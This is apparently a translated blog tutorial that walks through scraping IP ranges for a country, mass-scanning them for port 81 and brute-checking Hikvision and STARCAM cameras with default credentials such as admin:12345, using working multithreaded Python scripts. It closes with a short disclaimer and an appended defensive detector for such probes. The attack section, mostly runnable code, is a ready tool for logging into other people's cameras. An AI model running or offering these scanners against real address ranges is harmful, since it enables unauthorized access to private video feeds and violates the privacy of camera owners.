Determining the IP range to scan
First, decide which IP ranges to scan. You can write them out by hand; I scraped mine from a website, by region.
    #coding:utf-8
    import requests
    from bs4 import BeautifulSoup
    from urllib import quote
    import re

    place_name = "日本"
    url_ = 'http://ip.yqie.com/search.aspx?searchword=' + quote(place_name) + "&pagecurrent="
    pagecount = re.findall('页码:1/(\d*?)<',requests.get(url_+'1').content)
    index = 1
    fp = open('ip_range.txt','a')
    while index < int(pagecount[0]):
        url = url_ + str(index)
        page = requests.get(url)
        soup = BeautifulSoup(page.content,'lxml').find_all("tr")
        j = 0
        for i in soup:
            if j == 0:
                j = 1
                continue
            fp.write(i.contents[1].contents[0] + ' ' + i.contents[3].contents[0] + '\n')
        index = index + 1
    fp.close()
This produces text in the following format:
171.105.32.0 171.105.33.255
171.105.34.0 171.105.35.255
171.105.36.0 171.105.36.255
171.105.37.0 171.105.38.255
171.105.39.0 171.105.79.255
Scanning for IPs with port 81 open
Scan the IP ranges from the previous step and record the IPs that have port 81 open.
    #coding:utf-8
    import socket
    import struct
    import threading

    lock = threading.Lock()

    def write_ip(ip):
        fp = open('ip_81.txt','a')
        fp.write(ip+'\n')
        fp.close()

    def scan(ip,port):
        global lock
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.settimeout(0.5)
        try:
            result = s.connect_ex((ip,port))
            if result == 0:
                lock.acquire()
                write_ip(ip)
                lock.release()
            s.close()
        except:
            s.close()

    def get_ip_range():
        fp = open("ip_range.txt",'r')
        list = fp.readlines()
        fp.close()
        return list

    def main():
        port = 81
        ip_list = get_ip_range()
        for ip_range in ip_list:
            start = socket.ntohl(struct.unpack('I',socket.inet_aton(ip_range.split()[0]))[0])
            end = socket.ntohl(struct.unpack('I',socket.inet_aton(ip_range.split()[1]))[0])
            print ip_range.strip()
            while start < end:
                while threading.active_count() < 100 and start < end:
                    ip_point = socket.inet_ntoa(struct.pack('>I',start))
                    t = threading.Thread( target=scan, args =(ip_point,port,) )
                    t.start()
                    start = start + 1

    if __name__ == '__main__':
        main()
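The scan uses multiple threads here, otherwise it would be far too slow. Pick the thread count to suit your own machine; just don't hang your computer.
Scanning for Hikvision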
    #coding:utf-8
    import requests
    import threading

    lock = threading.Lock()

    def browse(ip,port):
        url = 'http://' + ip + ':' + str(port)
        userpwd = 'Basic YWRtaW46MTIzNDU='
        #userpwd = 'YWRtaW46ODg4ODg4'
        headers = {
            'X-Requested-With' : 'XMLHttpRequest',
            'Refer' : url + '/doc/page/login.asp',
            'If-Modified-Since' : '0' ,
            'Authorization' :userpwd
        }
        try:
            r = requests.get(url = url + '/ISAPI/Security/userCheck', headers = headers, timeout = 2)
            if r.status_code == 200 and r.text.find('OK') != -1:
                print url
                lock.acquire()
                fd = open('hikvision.txt','a')
                fd.write(url + '/doc/page/login.asp' + '\n')
                fd.close()
                lock.release()
        except:
            pass

    if __name__ == '__main__':
        fp = open("ip_81.txt",'r')
        list = fp.readlines()
        fp.close()
        index = 0
        while index < len(list):
            while threading.active_count() < 300 and index < len(list):
                t = threading.Thread(target=browse, args=(list[index].strip(), 81,))
                t.start()
                index = index + 1
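The Hikvision user-check URL is http://ip:81/ISAPI/Security/userCheck. The HTTP header (Authorization: Basic YWRtaW46MTIzNDU=) carries the user name and password (YWRtaW46MTIzNDU= decodes from Base64 to admin:12345). Hikvision products from before 2016 seem to have used 12345 as the default password; on later products the password has to be reset. Only the password 12345 is scanned for here; you could put together a weak-password dictionary and scan through all of it.
For logging in, Internet Explorer works best; remember to allow the plug-in to run.
PS: If you don't know Base64 encoding, look it up on Google.
Scanning for STARCAM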
    #coding:utf-8
    import requests
    import threading
    import traceback

    lock = threading.Lock()

    def browse(ip,port):
        url = 'http://' + ip + ':' + str(port)
        #userpwd = 'Basic YWRtaW46MTIzNDU='
        userpwd = 'Basic YWRtaW46ODg4ODg4'
        headers = {'Authorization' :userpwd}
        try:
            r = requests.get(url = url + '/monitor.htm' , headers = headers, timeout = 2)
            if r.status_code == 200 and r.content.find('camera') != -1:
                lock.acquire()
                fd = open('hikvision.txt','a')
                fd.write(url + '\n')
                fd.close()
                lock.release()
        except Exception, e:
            pass

    if __name__ == '__main__':
        fp = open("ip_81.txt",'r')
        list = fp.readlines()
        fp.close()
        index = 0
        while index < len(list):
            while threading.active_count() < 300 and index < len(list):
                t = threading.Thread(target=browse, args=(list[index].strip(), 81,))
                t.start()
                index = index + 1
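The principle is the same as for Hikvision; only the URL and the way the response is verified differ.
Summary
1. This is only experimental, and the code is ugly, so go easy on it. I have not put together a weak-password set either. The code above could be merged into a single script.
2. Network cameras that use the HTTP protocol carry a certain amount of risk (which is not to say that ones using a proprietary protocol are absolutely safe). As far as possible, avoid weak passwords such as 12345, 888888, 5201314 and qwer1234.
PS: The shortage of IP addresses has an upside too: most IP addresses in China are not fixed. Within a day at most, an individual user's IP will have changed.
3. This article was written mainly as an experiment; never do bad things that violate other people's privacy.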
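A defender-side counterpart to the probes described above, added here as an example and not part of the original article: it takes request heads as a sensor or honeypot listening on port 81 might record them, decodes the Basic credentials, and flags sources that try the weak passwords listed in the summary against the two probed paths. It is written for Python 3; the sample requests, addresses and function names are constructed for illustration.

```python
import base64
import re
from collections import defaultdict

WEAK_PASSWORDS = {"12345", "888888", "5201314", "qwer1234"}  # named on this page
PROBE_PATHS = ("/ISAPI/Security/userCheck", "/monitor.htm")  # probed by the scripts above

def _head(path, host, auth):
    """Build a constructed HTTP request head for the sample data."""
    return "GET %s HTTP/1.1\r\nHost: %s\r\nAuthorization: %s\r\n\r\n" % (path, host, auth)

_STRONG = "Basic " + base64.b64encode(b"operator:V9x!qL2pZ7w").decode()
# Constructed sample: (source IP, request head) as a sensor on port 81 might record.
SAMPLE = [
    ("198.51.100.7", _head(PROBE_PATHS[0], "192.0.2.10:81", "Basic YWRtaW46MTIzNDU=")),
    ("198.51.100.7", _head(PROBE_PATHS[1], "192.0.2.11:81", "Basic YWRtaW46ODg4ODg4")),
    ("203.0.113.5", _head(PROBE_PATHS[0], "192.0.2.10:81", _STRONG)),
    ("203.0.113.9", _head("/index.html", "192.0.2.10:81", "Basic !!notbase64")),
]

def basic_credentials(head):
    """Return (user, password) from an Authorization: Basic header, or None."""
    m = re.search(r"^Authorization:\s*Basic\s+(\S+)\s*$", head, re.I | re.M)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except ValueError:  # malformed Base64 or bytes that are not UTF-8
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None

def analyse(seen):
    """Return (weak-credential alerts, distinct probed hosts per source)."""
    alerts, targets = [], defaultdict(set)
    for src, head in seen:
        parts = head.split("\r\n", 1)[0].split(" ")
        path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
        creds = basic_credentials(head)
        if creds is None or path not in PROBE_PATHS:
            continue
        host = re.search(r"^Host:\s*(\S+)", head, re.I | re.M)
        targets[src].add(host.group(1) if host else "?")
        if creds[1] in WEAK_PASSWORDS:
            alerts.append((src, path, creds[0]))  # the password itself is not logged
    return alerts, {s: len(t) for s, t in targets.items()}

if __name__ == "__main__":
    for src, path, user in analyse(SAMPLE)[0]:
        print("weak default credential tried: src=%s path=%s user=%s" % (src, path, user))
```

A source that appears in the alerts and also has a high distinct-host count is sweeping an address range rather than mistyping a password on one device.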